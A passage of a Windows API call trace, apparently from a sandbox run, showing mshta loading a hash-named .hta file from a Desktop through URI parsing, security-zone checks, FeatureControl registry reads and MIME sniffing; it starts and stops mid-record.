0x0 [0052.814] GetSysColor (nIndex=33) returned 0x0 [0052.814] GetSysColor (nIndex=34) returned 0x0 [0052.814] GetSysColor (nIndex=35) returned 0x0 [0052.814] GetSysColor (nIndex=36) returned 0x0 [0052.814] GetSysColor (nIndex=37) returned 0x0 [0052.814] GetSysColor (nIndex=38) returned 0x0 [0052.814] GetSysColor (nIndex=39) returned 0x0 [0052.814] GetSysColor (nIndex=40) returned 0x0 [0052.814] GetSysColor (nIndex=41) returned 0x0 [0052.814] GetSysColor (nIndex=42) returned 0x0 [0052.814] GetSysColor (nIndex=43) returned 0x0 [0052.814] GetSysColor (nIndex=44) returned 0x0 [0052.814] GetSysColor (nIndex=45) returned 0x0 [0052.814] GetSysColor (nIndex=46) returned 0x0 [0052.814] GetSysColor (nIndex=47) returned 0x0 [0052.814] GetSysColor (nIndex=48) returned 0x0 [0052.814] GetSysColor (nIndex=49) returned 0x0 [0052.814] GetSysColor (nIndex=50) returned 0x0 [0052.814] GetSysColor (nIndex=51) returned 0x0 [0052.814] GetSysColor (nIndex=52) returned 0x0 [0052.814] GetSysColor (nIndex=53) returned 0x0 [0052.814] GetSysColor (nIndex=54) returned 0x0 [0052.814] GetSysColor (nIndex=55) returned 0x0 [0052.814] GetSysColor (nIndex=56) returned 0x0 [0052.814] GetSysColor (nIndex=57) returned 0x0 [0052.814] GetSysColor (nIndex=58) returned 0x0 [0052.814] GetSysColor (nIndex=59) returned 0x0 [0052.814] GetSysColor (nIndex=60) returned 0x0 [0052.814] GetSysColor (nIndex=61) returned 0x0 [0052.814] GetSysColor (nIndex=62) returned 0x0 [0052.814] GetSysColor (nIndex=63) returned 0x0 [0052.814] GetDeviceCaps (hdc=0x1a010b3a, index=38) returned 32409 [0052.814] ReleaseDC (hWnd=0x0, hDC=0x1a010b3a) returned 1 [0052.815] GetCurrentThreadId () returned 0xf14 [0052.815] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x10) returned 0x44e8f0 [0052.816] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x80) returned 0x4459f0 [0052.816] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c370 [0052.816] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x418e70 [0052.817] GetProcAddress (hModule=0x7feff1e0000, lpProcName=0x8) returned 0x7feff1e13f0 [0052.817] GetCurrentThreadId () returned 0xf14 [0052.817] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c370 | out: hHeap=0x3f0000) returned 1 [0052.817] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd2) returned 0x44fe90 [0052.817] ParseURLW (in: pcszURL="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", ppu=0x30ed40 | out: ppu=0x30ed40) returned 0x0 [0052.818] CreateUri (in: pwzURI="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x30ed00 | out: ppURI=0x30ed00*=0x44ef70) returned 0x0 [0052.818] IUnknown:AddRef (This=0x44ef70) returned 0x5 [0052.818] IInternetSecurityManager:SetSecuritySite (This=0x7fef0002708, pSite=0x44f420) returned 0x800c0011 [0052.821] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0052.821] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0052.821] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0052.821] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fef0002708, pwszUrl="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", dwAction=0x2700, pPolicy=0x30ecb0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x30ecb0*=0x0) returned 0x0 [0052.821] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0052.821] IUnknown:Release (This=0x44ef70) returned 0x4 [0052.821] IUnknown:Release (This=0x44ef70) returned 0x3 [0052.821] IUnknown:AddRef (This=0x44ef70) returned 0x4 [0052.821] IUri:GetPropertyDWORD (in: This=0x44ef70, uriProp=0x11, pdwProperty=0x30eaf8, dwFlags=0x0 | out: pdwProperty=0x30eaf8*=0x9) returned 0x0 [0052.821] IUnknown:Release (This=0x44ef70) returned 0x3 [0052.821] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd2) returned 0x4574d0 [0052.822] IInternetSecurityManager:GetSecurityId (in: This=0x43c0b0, pwszUrl="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", pbSecurityId=0x30eb90, pcbSecurityId=0x30eb80*=0x200, dwReserved=0x0 | out: pbSecurityId=0x30eb90*=0x66, pcbSecurityId=0x30eb80*=0x9) returned 0x0 [0052.822] IInternetSecurityManager:SetSecuritySite (This=0x7fef0002708, pSite=0x4574d4) returned 0x800c0011 [0052.822] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4574d0 | out: hHeap=0x3f0000) returned 1 [0052.822] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0052.822] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9) returned 0x44e870 [0052.823] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x30edc0, dwReserved=0x0 | out: ppIInternetSession=0x30edc0*=0x43ead0) returned 0x0 [0052.823] IInternetSession:RegisterNameSpace (This=0x43ead0, pCF=0x7fef0004f60, rclsid=0x7feefee1b30, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0052.824] IUnknown:AddRef (This=0x7fef0004f60) returned 0x1 [0052.824] IInternetSession:RegisterNameSpace (This=0x43ead0, pCF=0x7fef0004fa0, rclsid=0x7feefee1b10, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0052.824] IUnknown:AddRef (This=0x7fef0004fa0) returned 0x1 [0052.824] StrCmpICW (pszStr1="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", pszStr2="res://ieframe.dll/PhishSite.htm") returned -12 [0052.825] IUnknown:QueryInterface (in: This=0x42da90, riid=0x7feeff2ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x30ecb0 | out: ppvObject=0x30ecb0*=0x42da90) returned 0x0 [0052.825] IUnknown:Release (This=0x42da90) returned 0x9 [0052.825] IUnknown:AddRef (This=0x42da90) returned 0xa [0052.825] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x1f8) returned 0x4574d0 [0052.825] IUnknown:AddRef (This=0x42da90) returned 0xb [0052.825] IUnknown:QueryInterface (in: This=0x42da90, riid=0x7feeff2ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x30ec20 | out: ppvObject=0x30ec20*=0x42da90) returned 0x0 [0052.825] IUnknown:Release (This=0x42da90) returned 0xb [0052.825] IUnknown:AddRef (This=0x42da90) returned 0xc [0052.826] IUnknown:Release (This=0x42da90) returned 0xb [0052.826] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x68) returned 0x41b3e0 [0052.826] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xf8) returned 0x437c50 [0052.826] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x418ec0 [0052.826] IUri:GetScheme (in: This=0x42da90, pdwScheme=0x30ed30 | out: pdwScheme=0x30ed30*=0x9) returned 0x0 [0052.826] IUri:IsEqual (in: This=0x44ef70, pUri=0x42da90, pfEqual=0x30edd0 | out: pfEqual=0x30edd0*=1) returned 0x0 [0052.826] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0052.826] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x70) returned 0x414380 [0052.826] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x12) returned 0x44e890 [0052.826] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x451500 [0052.827] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x41b450 [0052.827] PostMessageW (hWnd=0x6030e, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0052.827] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x1d8) returned 0x4576d0 [0052.827] IUnknown:AddRef (This=0x42da90) returned 0xc [0052.827] IUnknown:QueryInterface (in: This=0x42da90, riid=0x7feeff2ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x30ec20 | out: ppvObject=0x30ec20*=0x42da90) returned 0x0 [0052.827] IUnknown:Release (This=0x42da90) returned 0xc [0052.827] IUnknown:AddRef (This=0x42da90) returned 0xd [0052.827] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x88) returned 0x445b10 [0052.827] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xa8) returned 0x4515b0 [0052.827] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x1b8) returned 0x4578b0 [0052.827] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x44dbd0 [0052.827] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x150) returned 0x457a70 [0052.827] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x44dc00 [0052.827] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x50) returned 0x44c370 [0052.828] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x2b8) returned 0x457bd0 [0052.828] IUnknown:QueryInterface (in: This=0x42da90, riid=0x7feeff2ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x30e810 | out: ppvObject=0x30e810*=0x42da90) returned 0x0 [0052.828] IUnknown:Release (This=0x42da90) returned 0xd [0052.828] IUnknown:AddRef (This=0x42da90) returned 0xe [0052.828] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0052.828] IUnknown:AddRef (This=0x42da90) returned 0xf [0052.828] IUnknown:AddRef (This=0x42da90) returned 0x10 [0052.828] IUnknown:QueryInterface (in: This=0x42da90, riid=0x7feeff2ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x30e7e0 | out: ppvObject=0x30e7e0*=0x42da90) returned 0x0 [0052.828] IUnknown:Release (This=0x42da90) returned 0x10 [0052.828] IUnknown:AddRef (This=0x42da90) returned 0x11 [0052.828] IUri:GetScheme (in: This=0x42da90, pdwScheme=0x457da8 | out: pdwScheme=0x457da8*=0x9) returned 0x0 [0052.829] IMoniker:IsSystemMoniker (in: This=0x414180, pdwMksys=0x30e870 | out: pdwMksys=0x30e870*=0x6) returned 0x0 [0053.052] CoInternetParseIUri (in: pIUri=0x42da90, ParseAction=0x9, dwFlags=0x0, pwzResult=0x30e900, cchResult=0x104, pcchResult=0x30e870, dwReserved=0x0 | out: pwzResult="C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", pcchResult=0x30e870) returned 0x0 [0053.052] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xc2) returned 0x457e90 [0053.064] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", lpFindFileData=0x30e5a0 | out: lpFindFileData=0x30e5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57ada700, ftCreationTime.dwHighDateTime=0x1d809f7, ftLastAccessTime.dwLowDateTime=0x58463d80, ftLastAccessTime.dwHighDateTime=0x1d809f7, ftLastWriteTime.dwLowDateTime=0x490ec200, ftLastWriteTime.dwHighDateTime=0x1d809ee, nFileSizeHigh=0x0, nFileSizeLow=0x47a7c, dwReserved0=0x55005c, dwReserved1=0x650073, cFileName="4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", cAlternateFileName="4D4D70~1.HTA")) returned 0x44c3d0 [0053.064] FindClose (in: hFindFile=0x44c3d0 | out: hFindFile=0x44c3d0) returned 1 [0053.065] IUnknown:QueryInterface (in: This=0x42da90, riid=0x7feeff2ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x30e810 | out: ppvObject=0x30e810*=0x42da90) returned 0x0 [0053.065] IUnknown:Release (This=0x42da90) returned 0x11 [0053.065] IUnknown:AddRef (This=0x42da90) returned 0x12 [0053.065] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x20) returned 0x44dc30 [0053.065] IInternetSession:CreateBinding (in: This=0x43ead0, pbc=0x0, szUrl="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", pUnkOuter=0x0, ppunk=0x0, ppOInetProt=0x44dc40, dwOption=0x0 | out: ppunk=0x0, ppOInetProt=0x44dc40*=0x458460) returned 0x0 [0053.070] IUnknown:QueryInterface (in: This=0x458460, riid=0x7feeff44860*(Data1=0x53c84785, Data2=0x8425, Data3=0x4dc5, Data4=([0]=0x97, [1]=0x1b, [2]=0xe5, [3]=0x8d, [4]=0x9c, [5]=0x19, [6]=0xf9, [7]=0xb6)), ppvObject=0x30e780 | out: ppvObject=0x30e780*=0x0) returned 0x80004002 [0053.070] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30e698 | out: phkResult=0x30e698*=0x1a0) returned 0x0 [0053.070] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30e6a0 | out: phkResult=0x30e6a0*=0x1a8) returned 0x0 [0053.070] RegOpenKeyExW (in: hKey=0x1a8, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x30e628 | out: phkResult=0x30e628*=0x0) returned 0x2 [0053.070] RegOpenKeyExW (in: hKey=0x1a0, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x30e628 | out: phkResult=0x30e628*=0x1ac) returned 0x0 [0053.070] SHRegGetValueW () returned 0x2 [0053.070] SHRegGetValueW () returned 0x2 [0053.070] RegCloseKey (hKey=0x1ac) returned 0x0 [0053.070] RegCloseKey (hKey=0x0) returned 0x6 [0053.070] RegCloseKey (hKey=0x0) returned 0x6 [0053.070] RegCloseKey (hKey=0x1a0) returned 0x0 [0053.070] RegCloseKey (hKey=0x1a8) returned 0x0 [0053.070] IUnknown:AddRef (This=0x458460) returned 0x2 [0053.071] IUnknown:QueryInterface (in: This=0x458460, riid=0x7feeff9b188*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x30e7b0 | out: ppvObject=0x30e7b0*=0x458460) returned 0x0 [0053.072] IInternetProtocolEx:StartEx (This=0x458460, pUri=0x42da90, pOIProtSink=0x457c70, pOIBindInfo=0x457c00, grfPI=0x10, dwReserved=0x0) returned 0x0 [0053.072] IUnknown:AddRef (This=0x457c70) returned 0x3 [0053.096] IInternetBindInfo:GetBindInfo (in: This=0x457c00, grfBINDF=0x458688, pbindinfo=0x458690 | out: grfBINDF=0x458688*=0x20083, pbindinfo=0x458690) returned 0x0 [0053.096] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30e5a8 | out: phkResult=0x30e5a8*=0x1a8) returned 0x0 [0053.096] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30e5b0 | out: phkResult=0x30e5b0*=0x1a0) returned 0x0 [0053.096] RegOpenKeyExW (in: hKey=0x1a0, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x30e538 | out: phkResult=0x30e538*=0x0) returned 0x2 [0053.096] RegOpenKeyExW (in: hKey=0x1a8, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x30e538 | out: phkResult=0x30e538*=0x0) returned 0x2 [0053.096] RegCloseKey (hKey=0x0) returned 0x6 [0053.096] RegCloseKey (hKey=0x0) returned 0x6 [0053.096] RegCloseKey (hKey=0x1a8) returned 0x0 [0053.097] RegCloseKey (hKey=0x1a0) returned 0x0 [0053.097] IUnknown:AddRef (This=0x457c70) returned 0x5 [0053.097] IInternetProtocolSink:ReportProgress (This=0x457c70, ulStatusCode=0x1e, szStatusText=0x0) returned 0x0 [0053.097] IInternetProtocolSink:ReportProgress (This=0x457c70, ulStatusCode=0xb, szStatusText="") returned 0x0 [0053.098] IInternetProtocolSink:ReportProgress (This=0x457c70, ulStatusCode=0xe, szStatusText="C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta") returned 0x0 [0053.098] GetCurrentProcessId () returned 0xf10 [0053.099] IInternetProtocolSink:ReportProgress (This=0x457c70, ulStatusCode=0xd, szStatusText="application/hta") returned 0x0 [0053.099] RegisterClipboardFormatA (lpszFormat="text/html") returned 0xc14f [0053.100] RegisterClipboardFormatA (lpszFormat="text/plain") returned 0xc150 [0053.100] RegisterClipboardFormatA (lpszFormat="text/x-component") returned 0xc173 [0053.100] RegisterClipboardFormatA (lpszFormat="image/gif") returned 0xc14b [0053.100] RegisterClipboardFormatA (lpszFormat="image/jpeg") returned 0xc149 [0053.100] RegisterClipboardFormatA (lpszFormat="image/pjpeg") returned 0xc14c [0053.100] RegisterClipboardFormatA (lpszFormat="image/bmp") returned 0xc15d [0053.101] RegisterClipboardFormatA (lpszFormat="image/x-jg") returned 0xc15e [0053.101] RegisterClipboardFormatA (lpszFormat="image/x-art") returned 0xc15f [0053.101] RegisterClipboardFormatA (lpszFormat="image/x-wmf") returned 0xc161 [0053.101] RegisterClipboardFormatA (lpszFormat="image/x-emf") returned 0xc160 [0053.101] RegisterClipboardFormatA (lpszFormat="video/avi") returned 0xc163 [0053.101] RegisterClipboardFormatA (lpszFormat="video/x-msvideo") returned 0xc164 [0053.101] RegisterClipboardFormatA (lpszFormat="video/mpeg") returned 0xc165 [0053.101] RegisterClipboardFormatA (lpszFormat="video/quicktime") returned 0xc174 [0053.101] RegisterClipboardFormatA (lpszFormat="application/hta") returned 0xc175 [0053.101] RegisterClipboardFormatA (lpszFormat="image/x-png") returned 0xc15b [0053.101] RegisterClipboardFormatA (lpszFormat="image/png") returned 0xc15c [0053.102] RegisterClipboardFormatA (lpszFormat="image/x-icon") returned 0xc162 [0053.102] StrCmpICW (pszStr1="application/hta", pszStr2="text/xml") returned -19 [0053.102] StrCmpNICW (lpStr1="applicat", lpStr2="text/css", nChar=8) returned -19 [0053.102] IInternetProtocolSink:ReportData (This=0x457c70, grfBSCF=0x5, ulProgress=0x47a7c, ulProgressMax=0x47a7c) returned 0x0 [0053.102] IUnknown:QueryInterface (in: This=0x458460, riid=0x7feefedf430*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x30caa8 | out: ppvObject=0x30caa8*=0x0) returned 0x80004002 [0053.102] IUnknown:QueryInterface (in: This=0x458460, riid=0x7feefedf420*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x30cab0 | out: ppvObject=0x30cab0*=0x0) returned 0x80004002 [0053.103] IInternetProtocolSink:ReportResult (This=0x457c70, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0 [0053.103] IUnknown:Release (This=0x458460) returned 0x2 [0053.103] IUnknown:Release (This=0x42da90) returned 0x13 [0053.103] IUnknown:Release (This=0x42da90) returned 0x12 [0053.103] IUnknown:Release (This=0x42da90) returned 0x11 [0053.103] CoTaskMemFree (pv=0x0) [0053.103] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x2a0) returned 0x4590e0 [0053.103] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x30eba0 | out: lpCPInfo=0x30eba0) returned 1 [0053.103] IUnknown:AddRef (This=0x43ead0) returned 0x3 [0053.103] IUnknown:AddRef (This=0x42da90) returned 0x12 [0053.103] IUnknown:QueryInterface (in: This=0x42da90, riid=0x7feeff2ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x30ebe0 | out: ppvObject=0x30ebe0*=0x42da90) returned 0x0 [0053.103] IUnknown:Release (This=0x42da90) returned 0x12 [0053.103] IUnknown:AddRef (This=0x42da90) returned 0x13 [0053.104] IUri:GetScheme (in: This=0x42da90, pdwScheme=0x30ec10 | out: pdwScheme=0x30ec10*=0x9) returned 0x0 [0053.104] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x90) returned 0x459390 [0053.104] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1a0 [0053.104] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7feef8505f0, lpParameter=0x459390, dwCreationFlags=0x0, lpThreadId=0x4593b0 | out: lpThreadId=0x4593b0*=0xf28) returned 0x9c [0053.106] GetCurrentThreadId () returned 0xf14 [0053.106] GetCurrentThreadId () returned 0xf14 [0053.106] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xce) returned 0x459430 [0053.106] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0053.106] MulDiv (nNumber=293500, nNumerator=4000, nDenominator=293500) returned 4000 [0053.106] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd2) returned 0x459510 [0053.106] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x250) returned 0x4595f0 [0053.106] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x44dc90 [0053.108] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xc2) returned 0x459c70 [0053.109] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x100) returned 0x459d40 [0053.109] IInternetProtocol:Read (in: This=0x458460, pv=0x459d4c, cb=0xc8, pcbRead=0x30eb20 | out: pv=0x459d4c, pcbRead=0x30eb20*=0xc8) returned 0x0 [0053.111] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", pSecMgr=0x0) returned 0x1 [0053.124] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea48 | out: phkResult=0x30ea48*=0x114) returned 0x0 [0053.124] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea50 | out: phkResult=0x30ea50*=0x188) returned 0x0 [0053.124] RegOpenKeyExW (in: hKey=0x188, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x30e9d8 | out: phkResult=0x30e9d8*=0x0) returned 0x2 [0053.124] RegOpenKeyExW (in: hKey=0x114, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x30e9d8 | out: phkResult=0x30e9d8*=0x0) returned 0x2 [0053.124] RegCloseKey (hKey=0x0) returned 0x6 [0053.124] RegCloseKey (hKey=0x0) returned 0x6 [0053.124] RegCloseKey (hKey=0x114) returned 0x0 [0053.124] RegCloseKey (hKey=0x188) returned 0x0 [0053.139] FindMimeFromData (in: pBC=0x0, pwzUrl="C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", pBuffer=0x30eb60, cbSize=0xc8, pwzMimeProposed="text/html", dwMimeFlags=0x6, ppwzMimeOut=0x30eb08, dwReserved=0x0 | out: ppwzMimeOut=0x30eb08*="text/html") returned 0x0 [0053.142] CoTaskMemFree (pv=0x44e990) [0053.142] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", pSecMgr=0x0) returned 0x1 [0053.142] StrCmpNIW (lpStr1="text/h", lpStr2="image/", nChar=6) returned 1 [0053.142] GetCurrentThreadId () returned 0xf14 [0053.142] SetEvent (hEvent=0x1a0) returned 1 [0053.142] IUnknown:Release (This=0x42da90) returned 0x12 [0053.142] IUnknown:Release (This=0x44f8f0) returned 0x1 [0053.142] IUnknown:Release (This=0x414180) returned 0x3 [0053.142] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0053.142] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0053.142] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0053.142] IUnknown:Release (This=0x42da90) returned 0x11 [0053.142] IUnknown:Release (This=0x42da90) returned 0x10 [0053.143] IUnknown:Release (This=0x42da90) returned 0xf [0053.143] IUnknown:Release (This=0x414180) returned 0x2 [0053.143] IUnknown:Release (This=0x42da90) returned 0xe [0053.143] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0053.143] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0053.143] CoTaskMemFree (pv=0x44ee80) [0053.143] CoTaskMemFree (pv=0x0) [0053.143] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0053.196] IUnknown:Release (This=0x42da90) returned 0xd [0053.196] CoTaskMemFree (pv=0x44eda0) [0053.196] GetClientRect (in: hWnd=0x40106, lpRect=0x30f5d0 | out: lpRect=0x30f5d0) returned 1 [0053.197] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb0) returned 0x459d40 [0053.197] GetClientRect (in: hWnd=0x40106, lpRect=0x459d88 | out: lpRect=0x459d88) returned 1 [0053.198] OffsetRect (in: lprc=0x459d88, dx=0, dy=0 | out: lprc=0x459d88) returned 1 [0053.198] OffsetRect (in: lprc=0x459d98, dx=0, dy=0 | out: lprc=0x459d98) returned 1 [0053.198] RegisterClassExW (param_1=0x30ee80) returned 0xc178 [0053.198] CoCreateInstance (in: rclsid=0x7feefef7850*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, 